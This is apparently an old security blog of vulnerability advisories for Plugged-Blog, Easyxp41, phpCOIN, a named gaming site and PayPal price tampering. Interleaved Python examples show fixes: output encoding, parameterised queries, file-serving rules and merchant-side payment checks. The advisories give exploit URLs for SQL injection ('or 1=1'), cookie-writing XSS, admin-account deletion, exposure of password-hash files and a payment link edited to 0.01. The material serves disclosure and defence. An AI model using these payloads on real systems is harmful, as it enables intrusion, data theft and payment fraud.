###############################
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin
vendor url: http://www.pluggedout.com
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html
vendor notify: yes exploit available: yes
###############################
Plugged-Blog is a CMS / weblog portal content management system. It is very easy to install and configure, fast, and ships with a README; it is meant to serve webmasters and ordinary users alike.
#########versions#########
0.4.8
#########Solution#########
No solution at this time !
#########Timeline########
Discovered: 29-07-2005
vendor notify: 29-07-2005
disclosure: 30-07-2005
####### Bad Definition ########
The following variables are taken from the URL and used without any check:
-Bad definition of variable userid=
-Bad definition of variable contentid=
-Bad definition of variable templateid=
-Bad definition of variable doctypeid=
-Bad definition of variable list_from=
-Bad definition of variable usertypeid=
-Bad definition of variable templateid=
-Bad definition of variable contenttypeid=
http://[victim]/admin.php?action=user_del&userid=[increment-the-current-value]
http://[victim]/admin.php?action=content_del&contentid=[increment-the-current-value]
http://[victim]/admin.php?action=template_edit&templateid=[increment-the-current-value]
http://[victim]/admin.php?action=document_add&doctypeid=[increment-the-current-value]
http://[victim]/admin.php?action=user_list&list_from=[increment-the-current-value]
http://[victim]/admin.php?action=usertype_edit&usertypeid=[increment-the-current-value]
http://[victim]/admin.php?action=template_del&templateid=[increment-the-current-value]
What is there to remove when nothing is there? :D (the delete is attempted even for an id that does not exist)
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[increment-the-current-value]
What is there to remove when nothing is there? :p
######## How to remove Admin ########
By default the users Admin and Guest exist; Admin has userid 2 and Guest has userid 1. To remove Admin, enter in the browser:
http://[victim]/admin.php?action=user_del&userid=2
To remove Guest, enter in the browser:
http://[victim]/admin.php?action=user_del&userid=1
Observation: this requires being logged in as the Admin user.
##################Proof of concept##################
Write XSS code into a message and it is rendered on the weblog home page. Once a message containing XSS code has been posted, it is also rendered at these URLs:
####### XSS message #######
http://[victim]/admin.php?action=report_statistics&report=visitors
http://[victim]/admin.php?action=content_list
http://[victim]/admin.php?action=report_statistics&report=page_hits
Select the ID to view (only the one that holds the XSS message) and the XSS fires.
#########
XSS
#########
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]
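The reflected XSS above works because the parameter is echoed straight back into the page. The following is an added example, not code from the advisory or from Plugged-Blog: the form template is an assumption about how content_edit echoes contentid into an input attribute, and the payload is the attribute break-out one the phpCOIN advisory further down this page uses, URL-encoded exactly as it appears there. It shows what a browser-like parser sees with and without output encoding.

```python
"""Reflected XSS by attribute break-out, and the output-encoding fix.

Added example, not code from the advisory or from Plugged-Blog. The form
template below is an assumption about how content_edit echoes contentid
back into the page; the payload is the one the phpCOIN advisory further
down this page uses, URL-encoded exactly as it appears there.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample: %22%3E%3Cscript%3E... as in the phpCOIN advisory URLs.
PAYLOAD_ENCODED = "%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E"


def param_from_url(url, name):
    """One query parameter, percent-decoded the way PHP's $_GET delivers it."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(contentid):
    """Hypothetical vulnerable form: the value is echoed raw into an attribute."""
    return f'<input type="text" name="contentid" value="{contentid}">'


def render_fixed(contentid):
    """Same form with HTML encoding; quote=True also turns double quotes into &quot;."""
    return f'<input type="text" name="contentid" value="{escape(contentid, quote=True)}">'


class TagCollector(HTMLParser):
    """Records what a browser-like parser sees: start tags and attribute values."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            self.attrs[(tag, name)] = value


def parse_page(html):
    parser = TagCollector()
    parser.feed(html)
    parser.close()
    return parser


if __name__ == "__main__":
    url = "http://victim.example/admin.php?action=content_edit&contentid=" + PAYLOAD_ENCODED
    value = param_from_url(url, "contentid")
    print("vulnerable page tags:", parse_page(render_vulnerable(value)).tags)
    print("fixed page tags:     ", parse_page(render_fixed(value)).tags)
```

With the raw echo the parser sees an input tag followed by a script tag; with encoding it sees only the input, and the attribute value still carries the submitted text unchanged, which is the point of encoding at output rather than filtering at input.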
###########
SQL errors & SQL injection
###########
If you put XSS code in the URL:
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]
or simply change the value of contenttypeid=[change-the-value]
you get the error message:
Problem with SQL
[SELECT nContentSecurityId, cms_ContentSecurity.nUserTypeId, cms_ContentSecurity.nContentTypeId, cUserTypeName, cView, cAdd, cEdit, cDelete, cApprove FROM cms_ContentSecurity INNER JOIN cms_UserType ON cms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId WHERE nContentTypeId= ORDER BY cUserTypeName]
and, for the content-type property table:
Problem with SQL [SELECT * FROM cms_ContentTypeProperties WHERE nContentTypeId= ORDER BY nSortIndex]
Both messages reveal table and field names.
Doing the same in the content_edit URL listed above (contentid=[XSS-Code]) gives:
Could not find record [SELECT * FROM cms_Content WHERE nContentId=;]
which again names the table and the affected field.
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]
produces this error:
SELECT COUNT(nStatisticId) AS nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress FROM cms_Statistics GROUP BY cSessionId, cIPAddress ORDER BY dLastView DESC LIMIT or 1=1,20
Note that the injected text appears verbatim, unquoted, inside the LIMIT clause: the value of list_from goes straight into the SQL string.
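The error messages above are the useful part of this finding: each one hands a tester the table names, the column the parameter lands in, and the clause it lands in. The following is an added example, not part of the advisory or of Plugged-Blog, that parses exactly those four messages (reproduced here as constructed sample input) and reports what they leak, so the same triage can be run over a batch of saved responses.

```python
"""Extract what verbose SQL error messages leak.

Added example (not part of the original advisory or of Plugged-Blog).
The four strings below are the error messages quoted in the advisory,
reproduced here as constructed sample input.
"""
import re

SAMPLE_ERRORS = [
    "Problem with SQL [SELECT nContentSecurityId, cms_ContentSecurity.nUserTypeId, "
    "cms_ContentSecurity.nContentTypeId, cUserTypeName, cView, cAdd, cEdit, cDelete, "
    "cApprove FROM cms_ContentSecurity INNER JOIN cms_UserType ON "
    "cms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId "
    "WHERE nContentTypeId= ORDER BY cUserTypeName]",
    "Problem with SQL [SELECT * FROM cms_ContentTypeProperties "
    "WHERE nContentTypeId= ORDER BY nSortIndex]",
    "Could not find record [SELECT * FROM cms_Content WHERE nContentId=;]",
    "SELECT COUNT(nStatisticId) AS nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress "
    "FROM cms_Statistics GROUP BY cSessionId, cIPAddress ORDER BY dLastView DESC LIMIT or 1=1,20",
]

# The two wrappers Plugged-Blog puts around the failing statement.
_LEAK_PREFIX = re.compile(r"(?:Problem with SQL|Could not find record)\s*\[(.*)\]\s*$", re.S)
# Table names are whatever follows FROM or JOIN.
_TABLES = re.compile(r"\b(?:FROM|JOIN)\s+([A-Za-z_][A-Za-z0-9_]*)", re.I)
# 'WHERE col=' followed by nothing, ';' or whitespace: the parameter was empty.
_WHERE_EMPTY = re.compile(r"WHERE\s+([A-Za-z_][A-Za-z0-9_.]*)\s*=\s*(?:;|\s|$)", re.I)
# The offset part of 'LIMIT offset,count'; anything non-numeric came from the request.
_LIMIT_OFFSET = re.compile(r"LIMIT\s+(.*?)(?:,\d+)?\s*$", re.I | re.S)


def extract_query(text):
    """The SQL statement inside a response, or None if the response has none."""
    m = _LEAK_PREFIX.search(text)
    if m:
        return m.group(1)
    return text if re.match(r"\s*SELECT\b", text, re.I) else None


def analyse(text):
    """Tables named in the leaked statement and the clause the input landed in."""
    query = extract_query(text)
    if query is None:
        return None
    tables = sorted(set(_TABLES.findall(query)))
    sink = None
    where = _WHERE_EMPTY.search(query)
    limit = _LIMIT_OFFSET.search(query)
    if where:
        sink = ("WHERE", where.group(1))
    elif limit and not re.fullmatch(r"\d+", limit.group(1).strip()):
        sink = ("LIMIT", limit.group(1).strip())
    return {"tables": tables, "sink": sink}


def leaked_schema(responses):
    """Union of table names across a batch of saved responses."""
    tables = set()
    for text in responses:
        result = analyse(text)
        if result:
            tables.update(result["tables"])
    return sorted(tables)


if __name__ == "__main__":
    for text in SAMPLE_ERRORS:
        print(analyse(text))
    print("schema so far:", leaked_schema(SAMPLE_ERRORS))
```

A WHERE sink with an empty right-hand side means the value is interpolated unquoted (an integer context), which is what makes the "or 1=1" style payloads on this page work; a non-numeric LIMIT offset means the same for list_from.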
######################## End ##########################
Thanks to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
Regards:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com/
Saturday, July 30, 2005
Friday, July 29, 2005
XSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data disclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/xss-flaws-and-data-disclosure-in.html
vendor notify: Yes exploit available: Yes
##################################################
Easyxp41 is a free script for building a web portal, and it is very easy to run. Easyxp41 contains several flaws that expose files directly, so their contents can be read.
###########
versions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify: 29-07-2005
Disclosure: 29-07-2005
############
proof of concept
############
################################################
information disclosure in the /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in the /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injection.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
The variable Forum= is unchecked; combined with the modules/forum/msg flaw above, forum messages can be read without authenticating to the PHP application:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
The names of the .dat files holding the forum messages are disclosed by:
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure:
http://[victim]/modules/login/db/login.db
##########################
User e-mail disclosure (same file):
http://[victim]/modules/login/db/login.db
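Two things go wrong in Easyxp41 according to the findings above: the ?pg= parameter accepts any path or URL to include (the iframe to google.fr, the forum module with an unchecked Forum= value), and the web server hands out the application's own data and config files (login.db, rep.db, the .dat messages, the cfg directories). The following is an added example, not Easyxp41's code, of the two checks that close those holes: an allowlist resolver for pg= and a static-file policy. The page registry, the denied directory names and the denied extensions are assumptions about how a hardened install would be configured; the request paths exercised are the ones quoted in the advisory.

```python
"""Allowlisting the ?pg= page-include parameter and refusing to serve the
data and config files the Easyxp41 advisory shows being read directly.

Added example, not Easyxp41's code. The allowed page list, the denied
directory names and the denied extensions are assumptions about how a
hardened install would be configured; the request paths used in the
demo are the ones quoted in the advisory.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumed registry of includable module pages (constructed for this example).
ALLOWED_PAGES = {
    "modules/forum/viewtopic.php",
    "modules/forum/viewprofil.php",
    "modules/news/index.php",
}
# Locations the advisory lists as browsable: forum db/cfg/msg, login db/cfg, admin.
DENIED_DIRS = {"cfg", "db", "msg", "admin"}
DENIED_EXTS = (".db", ".cfg", ".dat")


def pg_from_url(url):
    """The raw ?pg= value, as the script would read it from the query string."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("pg", [""])[0]


def resolve_pg(pg):
    """Local file to include for ?pg=..., or None to refuse the request."""
    if not pg:
        return None
    parts = urlsplit(pg)
    if parts.scheme or parts.netloc:
        return None            # pg=http://google.fr&pgtype=iframe: remote content
    norm = posixpath.normpath(pg)
    if norm.startswith("/") or norm == ".." or norm.startswith("../"):
        return None            # absolute path or directory traversal
    if norm not in ALLOWED_PAGES:
        return None            # not registered, e.g. modules/login/db/login.db
    return norm


def is_servable(url_path):
    """Should the web server hand this path out as a static file?"""
    if url_path.endswith("/"):
        return False           # directory index requests such as /modules/forum/db/
    path = posixpath.normpath(url_path.lstrip("/"))
    if any(seg in DENIED_DIRS for seg in path.split("/")):
        return False           # anything under cfg/, db/, msg/ or admin/
    if path.lower().endswith(DENIED_EXTS):
        return False           # login.db, rep.db, config.cfg, 1103495330.dat
    return True


if __name__ == "__main__":
    for url in (
        "http://victim.example/index.php?pg=modules/forum/viewtopic.php&pgfull",
        "http://victim.example/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500",
        "http://victim.example/index.php?pg=&L=500&H=500",
    ):
        print(url, "->", resolve_pg(pg_from_url(url)))
    for path in ("/modules/forum/msg/1103495330.dat", "/modules/login/db/login.db",
                 "/modules/forum/cfg/", "/cfg/config.cfg", "/index.php"):
        print(path, "->", "serve" if is_servable(path) else "deny")
```

Normalising before the allowlist check is what lets a harmless `modules/forum/../forum/viewprofil.php` through while still refusing anything that escapes the web root; the file policy is deliberately an extension and directory denylist because the advisory shows data files living beside the PHP scripts.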
############################# End ##########################
Thanks to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
Regards:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
Friday, July 22, 2005
SQL Injection & XSS on the website: counter-adiction.com
First of all, it was almost IMPOSSIBLE for me to get in touch with the administrators. They have no contact e-mail? A site with 20 users online and no contact e-mail; nobody answered in the QuakeNet channel either, and I left several messages, both in private queries and in the general channel. I hope you have seen them.
Affected URL: http://counter-adiction.com
Type of flaw: SQL Injection & XSS
Bugs discovered by: FalconDeOro & Lostmon
Also involved in the discovery: Clan DeadZone : http://deadzone.de.funpic.org/
Let's start with the XSS flaw:
http://www.counter-adiction.com/usuario.php?idNick=[XSS-Code]
The SQL injection flaws:
http://www.counter-adiction.com/galeria.php?idGaleria=[SQL-Injection]
http://www.counter-adiction.com/downloads.php?idCategoria=[SQL-Injection]
http://www.counter-adiction.com/descargar.php?idArchivo=[SQL-Injection]
Minor curiosities (harmless, just curiosities):
http://www.counter-adiction.com/not_ver.php?idNoticia=[change-value]
Acknowledgements:
Thanks Lostmon for being patient with me and teaching me (his weblog: http://lostmon.blogspot.com/ )
Thanks to clan DeadZone : http://deadzone.de.funpic.org and among them: Soed, icmp, kelder honk and brink.
Special thanks to NewCastle, Lmc and the old dismarking crew.
Wednesday, June 01, 2005
PayPal lets you change prices
This flaw affects ALL merchants that use PayPal.
The flaw has been confirmed by PayPal and they are aware of it.
In the case of eDonkey, for example, the original URL looks like this:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=register@edonkey2000.com&item_name=eDonkey%20Pro&item_number=1&amount=19.95&no_shipping=1&return=http%3A%2F%2Fwww.overnet.com%2Fpaypal.php?cancel_return=http%3A%2F%2Fwww.edonkey2000.com&submit.x=70&submit.y=15
We can change the data in the URL like this:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=[SELLER-EMAIL]&item_name=[PRODUCT-NAME]&item_number=1&amount=0.01&no_shipping=1&return=[RETURN-URL]%2Fpaypal.php?cancel_return=http%3A%2F%2F[PRODUCT-SITE]&submit.x=70&submit.y=15
You can change the e-mail account, the price, the URL, what the product costs...
My e-mail: falcondeoro@gmail.com
Thanks Lostmon for what you already know ;)
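Every parameter in that Buy Now link, the price included, is chosen by the browser that submits it, so the seller's protection has to sit on the seller's side: deliver only after the payment notification says the right account received at least the catalog price for that item. The following is an added example, not code from the blog post or from PayPal. The original URL is the eDonkey one quoted above; the tampered copy, the catalog and the notification records are constructed. The field names mc_gross, mc_currency, receiver_email, payment_status, item_number and txn_id follow PayPal's IPN variable names, and the postback that verifies a notification with PayPal is left out and assumed to have already happened.

```python
"""Client-controlled price in a PayPal Buy Now link, and the server-side
check a merchant needs before delivering the goods.

Added example; not code from the blog post or from PayPal. The original
URL is the eDonkey one quoted in the post; the tampered copy, the catalog
and the notification records are constructed. Field names follow PayPal's
IPN variable names; the postback that validates a notification with
PayPal is left out here and assumed to have happened already.
"""
from decimal import Decimal
from urllib.parse import parse_qs, urlsplit

ORIGINAL = (
    "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=register@edonkey2000.com"
    "&item_name=eDonkey%20Pro&item_number=1&amount=19.95&no_shipping=1"
    "&return=http%3A%2F%2Fwww.overnet.com%2Fpaypal.php?cancel_return=http%3A%2F%2Fwww.edonkey2000.com"
    "&submit.x=70&submit.y=15"
)
# What the post describes: the same link with the seller and the amount edited.
TAMPERED = ORIGINAL.replace("amount=19.95", "amount=0.01").replace(
    "business=register@edonkey2000.com", "business=someone-else@example.com")

# Constructed merchant-side catalog: the only price that may be trusted.
CATALOG = {"1": {"name": "eDonkey Pro", "price": Decimal("19.95"), "currency": "USD"}}
MERCHANT_EMAIL = "register@edonkey2000.com"
_seen_txn = set()   # transaction ids already fulfilled (replay guard)


def fields(url):
    """Query parameters of a Buy Now link as a flat dict."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def tampered_fields(original, tampered):
    """Which parameters differ between the seller's link and the one submitted."""
    a, b = fields(original), fields(tampered)
    return {k: (a.get(k), b.get(k)) for k in sorted(set(a) | set(b)) if a.get(k) != b.get(k)}


def should_fulfil(n):
    """Decide from an already-verified payment notification whether to deliver."""
    item = CATALOG.get(n.get("item_number"))
    if item is None:
        return False, "unknown item"
    if n.get("payment_status") != "Completed":
        return False, "payment not completed"
    if n.get("receiver_email", "").lower() != MERCHANT_EMAIL:
        return False, "paid to a different account"
    if n.get("mc_currency") != item["currency"]:
        return False, "wrong currency"
    paid = Decimal(n.get("mc_gross", "0"))
    if paid < item["price"]:
        return False, "underpaid: got %s, expected %s" % (paid, item["price"])
    if n.get("txn_id") in _seen_txn:
        return False, "duplicate notification"
    _seen_txn.add(n.get("txn_id"))
    return True, "deliver %s" % item["name"]


if __name__ == "__main__":
    print("changed by the buyer:", tampered_fields(ORIGINAL, TAMPERED))
    notice = {"item_number": "1", "payment_status": "Completed", "mc_currency": "USD",
              "receiver_email": "register@edonkey2000.com", "mc_gross": "0.01", "txn_id": "T1"}
    print(should_fulfil(notice))
```

Note the order of the checks: receiver_email comes before the amount, because a link that redirects the payment to another account can carry the correct price and still leave the merchant unpaid, and the txn_id guard stops one genuine payment from being presented twice.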
Saturday, March 05, 2005
SQL injection and XSS in phpCOIN
phpCOIN is free software used on hosting resellers' websites, among others.
Well, I'll just copy it directly from my friend Lostmon; you will see it more clearly:
############ sql injection: ############
discloses some sql data...
http://[target]/phpcoin/mod.php?mod=siteinfo&id=1'
ummm, then ...
http://[target]/phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]/phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]/phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]/phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]/phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]/phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]/phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1
################# cross site scripting #################
http://[target]/phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]/phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]/phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]/phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Other scripts are susceptible to HTML or JavaScript code injection...
################## versions affected ##################
1.2.0
1.2.1b
1.2.1
########## Solution : ##########
No solution was available at this time; look for vendor information or for new release versions.
Credits:
Regards: Lostmon (lostmon@gmail.com). Thanks to Estrella for being my light. Thanks to all who believed in me. Web-Blog: http://lostmon.blogspot.com  Curiosity is what moves the mind....
-------------------------------------------------------------------
Personal opinion:
Many thanks Lostmon for telling us about this valuable phpCOIN bug; I hope you keep publishing many more of this kind :D
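The phpCOIN URLs above and the Plugged-Blog findings earlier on this page are the same bug: a numeric id (faq_id, ord_id, contentid, list_from) is pasted into the SQL string, so `2 or 1=1` widens a WHERE to every row and an empty or non-numeric value throws the verbose errors quoted there. The following is an added example for both sections, not either CMS's real code, that reproduces the string-built queries against an in-memory SQLite table and puts the parameterised, type-checked version next to them. The table cms_Content and its column names are taken from the Plugged-Blog error messages; the rows are constructed.

```python
"""Numeric-id SQL injection as seen in the Plugged-Blog and phpCOIN
advisories on this page, reproduced against an in-memory SQLite table,
next to the parameterised version that closes it.

Added example; neither CMS's real code. Table cms_Content and its column
names come from the Plugged-Blog error messages; the rows are constructed.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cms_Content (nContentId INTEGER PRIMARY KEY, cTitle TEXT)")
    db.executemany("INSERT INTO cms_Content VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Draft, unpublished"), (3, "Admin notes")])
    return db


def content_vulnerable(db, contentid):
    """String-built lookup, the shape the leaked 'WHERE nContentId=' message implies."""
    sql = "SELECT * FROM cms_Content WHERE nContentId=%s" % contentid
    return db.execute(sql).fetchall()


def list_vulnerable(db, list_from):
    """String-built paging, the shape of the leaked 'LIMIT or 1=1,20' message."""
    sql = "SELECT * FROM cms_Content ORDER BY nContentId LIMIT %s,20" % list_from
    return db.execute(sql).fetchall()


def as_id(value):
    """Accept only a plain ASCII non-negative integer; reject everything else."""
    if not isinstance(value, str) or not value.isascii() or not value.isdigit():
        raise ValueError("invalid id: %r" % (value,))
    return int(value)


def content_fixed(db, contentid):
    """Type check first, then a bound parameter; the value can never reach the parser."""
    return db.execute("SELECT * FROM cms_Content WHERE nContentId=?",
                      (as_id(contentid),)).fetchall()


def list_fixed(db, list_from):
    """Same for the LIMIT offset: SQLite accepts a bound parameter there too."""
    return db.execute("SELECT * FROM cms_Content ORDER BY nContentId LIMIT ?,20",
                      (as_id(list_from),)).fetchall()


def probe(fn, db, value):
    """Run one request and classify the outcome the way a tester reads the response."""
    try:
        rows = fn(db, value)
    except (sqlite3.OperationalError, ValueError) as exc:
        return ("error", str(exc))
    return ("rows", len(rows))


if __name__ == "__main__":
    db = make_db()
    for fn in (content_vulnerable, content_fixed):
        for value in ("2", "2 or 1=1", ""):
            print(fn.__name__, repr(value), "->", probe(fn, db, value))
    for fn in (list_vulnerable, list_fixed):
        for value in ("0", "or 1=1"):
            print(fn.__name__, repr(value), "->", probe(fn, db, value))
```

The vulnerable lookup returns every row for `2 or 1=1` and a parser error for an empty id, which is the "Could not find record" and "Problem with SQL" behaviour in the Plugged-Blog section; the fixed versions reject the same inputs before any SQL is built, and a rejected id should be answered with a generic error, never with the statement text.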